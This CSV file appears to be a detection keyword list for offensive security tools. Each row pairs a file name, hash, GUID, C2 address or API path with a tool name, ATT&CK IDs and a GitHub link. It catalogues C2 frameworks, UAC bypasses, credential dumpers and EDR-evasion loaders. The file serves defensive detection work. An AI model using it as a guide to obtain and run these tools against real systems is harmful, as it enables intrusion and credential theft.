Escalation,https://github.com/0xbadjuju/Tokenvator,1,1,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*0xbadjuju/WheresMyImplant*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*0xdarkvortex-MalwareDevelopment*,offensive_tool_keyword,prometheus,malware C2,T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment,1,1,N/A,10,10,176,63,2020-07-21T06:14:44Z,2018-09-04T15:38:53Z -*0xdeadbeef*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/timwr/CVE-2016-5195,1,1,N/A,N/A,10,935,404,2021-02-03T16:03:40Z,2016-10-21T11:19:21Z -*0xsp-SRD/mortar*,offensive_tool_keyword,mortar,red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions,T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562,TA0002 - TA0003 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/0xsp-SRD/mortar,1,1,N/A,N/A,10,1181,193,2022-08-03T03:38:57Z,2021-11-25T16:49:47Z -*0xthirteen/MoveKit*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Lateral Movement,T1021.002 - T1021.006 - T1021.004,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/MoveKit,1,1,N/A,10,7,615,114,2020-02-21T20:23:45Z,2020-01-24T22:19:16Z -*0xthirteen/PerfExec*,offensive_tool_keyword,PerfExec,PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.,T1055.001 - T1059.001 - T1059.003 - T1027.002,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/PerfExec,1,1,N/A,7,1,73,8,2023-08-02T20:53:24Z,2023-07-11T16:43:47Z -*0xthirteen/SharpRDP*,offensive_tool_keyword,SharpRDP,Remote Desktop Protocol .NET Console Application for Authenticated Command Execution,T1021.001 - T1059.001 - T1059.003,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/SharpRDP,1,1,N/A,10,9,873,515,2022-11-13T05:29:33Z,2020-01-21T08:31:50Z -*0xthirteen/StayKit*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Persistence,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0xthirteen/StayKit,1,1,N/A,10,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*0xthirteen/StayKit*,offensive_tool_keyword,cobaltstrike,StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Persistence,https://github.com/0xthirteen/StayKit,1,1,N/A,N/A,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*1_FindDomain.sh*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*105C2C6D-1C0A-4535-A231-80E355EFB112*,offensive_tool_keyword,RoguePotato,Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/RoguePotato,1,0,N/A,10,9,876,125,2021-01-09T20:43:07Z,2020-05-10T17:38:28Z -*10979d6665292065b840f8d95366201a686146e949908cdd41331699b331ab9c*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*10b06fce5935839c3978cd7fe130355be750cfa03986adff5c33bd9f7922871e*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*10f5885eb8ecc5ecbbea6717ba163761b34a416c7beff36276e7b590f39161b9*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*10k-worst-pass.txt*,offensive_tool_keyword,AD exploitation cheat sheet,Crack with TGSRepCrack,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*11385CC1-54B7-4968-9052-DF8BB1961F1E*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,0,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*119.45.104.153:8848*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*12372473c8b8cc25108b254a5ed994ee3895687236f8ad062006c1d8f6916475*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*123abcbde966780cef8d9ec24523acac*,offensive_tool_keyword,NimExec,Fileless Command Execution for Lateral Movement in Nim,T1021.006 - T1059.005 - T1564.001,TA0008 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/frkngksl/NimExec,1,0,N/A,N/A,4,307,33,2023-06-23T11:07:20Z,2023-04-21T19:46:53Z -*124e6ada27ffbe0ff97f51eb9d7caaf86b531bcff90ed5a075ff89b45b00cba5*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*127.0.0.1 is not advisable as a source. Use -l 127.0.0.1 to override this warning*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Shell spawning,https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*127.0.0.1:1080*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,0,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*127.0.0.1:1337*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*127.0.0.1:2222*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*127.0.0.1:31337*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*127.0.0.1:4567*,offensive_tool_keyword,primusC2,another C2 framework,T1090 - T1071,TA0011 - TA0002,N/A,N/A,C2,https://github.com/Primusinterp/PrimusC2,1,1,N/A,10,10,42,4,2023-08-21T04:05:48Z,2023-04-19T10:59:30Z -*127.0.0.1:53531*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,1,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*127.0.0.1:5555*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,0,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*127.0.0.1:8022*,offensive_tool_keyword,MaccaroniC2,A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.,T1090 - T1059.003,TA0011 - TA0002,N/A,N/A,C2,https://github.com/CalfCrusher/MaccaroniC2,1,1,N/A,10,10,57,9,2023-06-27T17:43:59Z,2023-05-21T13:33:48Z -*127.0.0.1:8848*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*127.0.0.1:9050*,offensive_tool_keyword,MaccaroniC2,A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.,T1090 - T1059.003,TA0011 - TA0002,N/A,N/A,C2,https://github.com/CalfCrusher/MaccaroniC2,1,1,N/A,10,10,57,9,2023-06-27T17:43:59Z,2023-05-21T13:33:48Z -*1337*/api/agents/*/results?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*1337*/api/creds?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*1337*/api/listeners?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*1337*infernal-twin*,offensive_tool_keyword,infernal-twin,This tool is created to aid the penetration testers in assessing wireless security.,T1533 - T1553 - T1560 - T1569 - T1583,TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/entropy1337/infernal-twin,1,1,N/A,N/A,10,1193,273,2022-10-27T11:39:14Z,2015-02-07T21:04:57Z -*1337OMGsam*,offensive_tool_keyword,SamDumpCable,Dump users sam and system hive and exfiltrate them,T1003.002 - T1564.001,TA0006 - TA0010,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*1337OMGsys*,offensive_tool_keyword,SamDumpCable,Dump users sam and system hive and exfiltrate them,T1003.002 - T1564.001,TA0006 - TA0010,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*133f71bd8d6d4ca80a9a542c2492ba9a65e05b0cfa681a85dd05d9cf998a1bb4*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*1424fde08d6994062fc8a795ff8d80d30060c4991103c4af59228dcf60171eca*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*1617117C-0E94-4E6A-922C-836D616EC1F5*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,0,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*16726c4330d7db5d56a5a11503314533b170783441c3f8282b66f126295a289e*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*175c9fc0c7046d006a6db698144fab3b40bd191e15617e7fba417a466c3a0b6f*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*192.168.0.110:1234*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,1,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*192.168.1.229 Passw0rd!*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,0,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*1939a69f717d4baa13d558c11e1fc7dee1e8ce8fcc5f0fe0dea11845e22ce4c8*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*195a6712e204e1d01dc1d36b9d43a2a477b0833019294b37512d8baaa98e524e*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*1a279f5df4103743b823ec2a6a08436fdf63fe30*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*1BACEDDC-CD87-41DC-948C-1C12F960BECB*,offensive_tool_keyword,themebleed,Proof-of-Concept for CVE-2023-38146,T1566.001 - T1077 - T1213.002,TA0007 - TA0011 - TA0010,N/A,N/A,Exploitation tools,https://github.com/gabe-k/themebleed,1,0,N/A,10,2,143,27,2023-09-13T04:50:29Z,2023-09-13T04:00:14Z -*1c50adeb-53ac-41b9-9c34-7045cffbae45*,offensive_tool_keyword,o365enum,Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.,T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002,TA0040 - TA0010 - TA0007,N/A,N/A,Exploitation tools,https://github.com/gremwell/o365enum,1,0,N/A,7,3,212,40,2021-04-23T14:40:52Z,2020-02-18T12:22:50Z -*1C5EDA8C-D27F-44A4-A156-6F863477194D*,offensive_tool_keyword,ntdlll-unhooking-collection,unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless),T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/ntdlll-unhooking-collection,1,0,N/A,9,2,152,34,2023-08-02T02:26:33Z,2023-02-07T16:54:15Z -*1E70D62D-CC36-480F-82BB-E9593A759AF9*,offensive_tool_keyword,PowerShx,Run Powershell without software restrictions.,T1059.001 - T1055.001 - T1055.012,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/iomoath/PowerShx,1,0,N/A,7,3,267,46,2021-09-08T03:44:10Z,2021-09-06T18:32:45Z -*1f047faec08d9a35c304fb4a7cf13853589359a8f7cbfdd48c5d5807712dcf05*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*1f047faec08d9a35c304fb4a7cf13853589359a8f7cbfdd48c5d5807712dcf05*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*1f25c454ae331c582fbdb7af8a9839785a795b06a6649d92484b79565f7174ae*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*1HeroYcNYMhjsq8RYCx1stSaRZnQd9B9Eq*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,1,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*1mil-AD-passwords.txt*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,1,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*1N3/Sn1per*,offensive_tool_keyword,Sn1per,Automated Pentest Recon Scanner.,T1083 - T1087 - T1518,TA0001 - TA0002 - TA0003,N/A,N/A,Information Gathering,https://github.com/1N3/Sn1per,1,0,N/A,N/A,10,6901,1737,2023-09-29T22:14:24Z,2015-09-06T15:47:38Z -*1N73LL1G3NC3x/Nightmangle*,offensive_tool_keyword,Nightmangle,ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/1N73LL1G3NC3x/Nightmangle,1,1,N/A,10,10,72,10,2023-09-26T19:21:31Z,2023-09-26T18:25:23Z -*1password2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*2_lyncbrute.sh*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*207953846cc26417e163db3dc483a65e8e94bc9bd86c8928d59b078f1e72fcc7*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*210A3DB2-11E3-4BB4-BE7D-554935DCCA43*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*21582b3a68e8753322a1b1c7e550ae7fd305de4935de68fbde9f87570f484d00*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense 